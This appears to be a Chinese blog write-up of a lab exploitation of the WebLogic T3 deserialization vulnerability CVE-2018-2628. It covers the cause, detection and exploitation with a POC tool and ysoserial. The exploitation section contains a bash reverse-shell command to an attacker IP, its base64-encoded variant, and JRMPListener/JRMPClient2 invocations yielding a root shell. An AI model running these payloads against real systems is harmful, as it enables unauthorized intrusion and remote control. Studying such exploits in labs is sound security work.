一、漏洞成因

攻击者利用RMI绕过weblogic黑名单限制,将加载的内容利用readObject解析,造成反序列化漏洞,该漏洞主要由于T3协议触发,所有开放weblogic控制台7001端口,默认开启T3服务,攻击者发送构造好的T3协议数据,获取目标服务器的权限。

RMI:Java 的一组拥护开发分布式应用程序的 API,实现了不同操作系统之间程序的方法调用。值得注意的是,RMI 的传输 100% 基于反序列化,Java RMI 的默认端口是 1099 端口。

java反序列化:指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类的 readObject() 方法用于反序列化。

T3协议:WebLogic Server 中的 RMI(远程方法调用) 通信使用 T3 协议在 WebLogic Server 和其他 Java 程序(包括客户端及其他 WebLogic Server 实例)间传输数据。服务器实例将跟踪所连接的每个 Java 虚拟机(Java Virtual Machine,简称 JVM),并创建单个 T3 连接以承担 JVM 的所有流量。

二、漏洞识别

1、扫描端口,这里不知道为啥没有扫描出特定的T3协议端

2、POC工具利用


检测出具有CVE-2018-2628漏洞

三、漏洞利用

启动JRMP Server,使得触发漏洞后的weblogic,可远程调用特定的程序:
攻击了一台存在漏洞的靶机时,靶机就会找这台具有JRMP服务的机器,寻找payload;

bash命令:bash -i >& /dev/tcp/192.168.236.128/7777 0>&1

由于Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法,所以我们使用base64的反弹shell形式,具体如下:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}

格式为:bash -c {echo,上面反弹shell的base64编码}|{base64,-d}|{bash,-i}

运行代码:
java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 8888 Jdk7u21 ‘bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}’

说明开启成功,JRMP正在监听8888端口

执行代码:
java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 192.168.236.128:8888 | xxd -p | tr -d $‘\n’ && echo


将构造的数据,复制粘贴到EXP中的payload,并且修改IP为目标IP:

保存后,监听bash脚本中的7777端口,python运行这个EXP脚本:
一开始报错,是因为python默认的是python3运行,但是python3中print语法中得带有括号,所以报错,这里进行python2运行,成功运行:

kali这边接收到shell,且为root权限:

四、总结

1、一定要解决问题,不能放弃
2、下次学习代码审计
3、要在该文件的目录下运行程序才有效

Weblogic反序列化漏洞(CVE-2018-2628)相关推荐

  1. 【技术推荐】WebLogic 反序列化漏洞深入分析

    前言 Oracle 官方 2021 年 10 月份发布的安全更新通告中披露了 WebLogic 组件存在高危漏洞,攻击者可以在未授权的情况下通过 IIOP.T3 协议对存在漏洞的 WebLogic S ...

  2. Javaweb安全——Weblogic反序列化漏洞(一)

    从原生反序列化过程开始谈起. 原生反序列化 序列化就是把对象转换成字节流,便于保存在内存.文件.数据库中:反序列化即逆过程,由字节流还原成对象. 大致是这么一个过程,简单画了个图: 测试类如下: pa ...

  3. weblogic反序列化漏洞CVE-2018-2628-批量检测脚本

    #coding=utf-8import socket import time import re,os,sys,codecstype = 'utf-8' reload(sys) sys.setdefa ...

  4. Weblogic反序列化漏洞补丁更新解决方案

    Weblogic反序列化漏洞补丁更新解决方案 参考文章: (1)Weblogic反序列化漏洞补丁更新解决方案 (2)https://www.cnblogs.com/knightlilz/p/p2078 ...

  5. java weblogic反序列化,WebLogic 反序列化漏洞(CVE-2017-10271)

    0x00 WebLogic WLS组件反序列化漏洞 这个漏洞的编号是 CVE-2017-10271,漏洞存在于 Oracle WebLogic 的 wls-wsat 组件中,该组件的 XMLDecod ...

  6. weblogic反序列化漏洞

    2019独角兽企业重金招聘Python工程师标准>>> 1.检测工具 https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-102 ...

  7. cve-2018-2628 Weblogic反序列化漏洞实现反弹shell

    测试机:MacBook-Air 测试机IP:192.168.0.100 靶机IP:192.168.0.100:7001 环境: docker 工具:CVE-2018-2628漏洞利用工具包 下载 一. ...

  8. oracle系统漏洞绿盟,【处置建议】Oracle WebLogic反序列化漏洞(CVE-2018-2628)安全处置建议...

    阅读: 16,098 Oracle官方发布了4月份的关键补丁更新CPU(Critical Patch Update),其中包含一个高危的远程代码执行漏洞(CVE-2018-2628),通过该漏洞,攻击 ...

  9. 修而未复:说说WebLogic那修不完的Java反序列化漏洞

    编者说明:这篇文章初稿写在Oracle CPU补丁发布之后,考虑到文章内容的影响,并未在当时发布,WebLogic 的 Java 反序列化漏洞,已经修复了多次,最终的修复仍然未彻底解决问题. 背景 当 ...

最新文章

  1. 使用Magicodes.SwaggerUI快速配置SwaggerUI以及设置API分组
  2. C风格字符串与C++风格字符串
  3. Eureka error java.net.UnknownHostException:
  4. 如何从课堂与教学内容两方面提高培训效率------张孝祥
  5. 离线电脑搭建开发环境
  6. jquery学习笔记之选择器
  7. 大学四年,自学编程常用的10个学习网站
  8. 宿华辞任快手CEO、程一笑接任;百世将国内快递业务68亿元出售给极兔|美通社头条...
  9. 高效工作节省时间的一些小技巧
  10. oracle minus 利用率,oracle minus用法
  11. HTML正方体滚动特效
  12. S3DIS 点云数据集的手动修复问题
  13. git中merge分支到master产生冲突
  14. autojs 自阅 刷宝短视频 脚本源码
  15. 图片添加水印相关记录
  16. amos调节变量怎么画_amos怎么把变量颜色
  17. phonegap mysql_phoneGap-Android开发环境搭建
  18. 吐血推荐收藏的学位论文排版教程(完整版)
  19. 不超过十个人的好电影
  20. ffmpeg调整视频时长

热门文章

  1. 学习笔记:IDF 移动端UX设计 1 移动端UX设计介绍 1.1-1.3
  2. 实现全选/取消全选功能
  3. gt2pro搭载鸿蒙系统,首款鸿蒙系统智能手表华为Watch GT2 Pro还能这么玩!
  4. vivo 2020届校招在线编程笔试
  5. php 织梦模板 防盗,织梦dedecms商业教程 织梦DedeCMS模板防盗的四种方法
  6. 铁氧体磁珠相关知识总结
  7. MATLAB统计分析-假设检验
  8. 郑州大学统考英语计算机题库,2017年大学英语统考大纲试题(题型版五)
  9. 省钱购物app排行榜!
  10. REDIS09_LBS出现背景、GEO算法介绍、算法步骤、剖析、邻近网格位置推算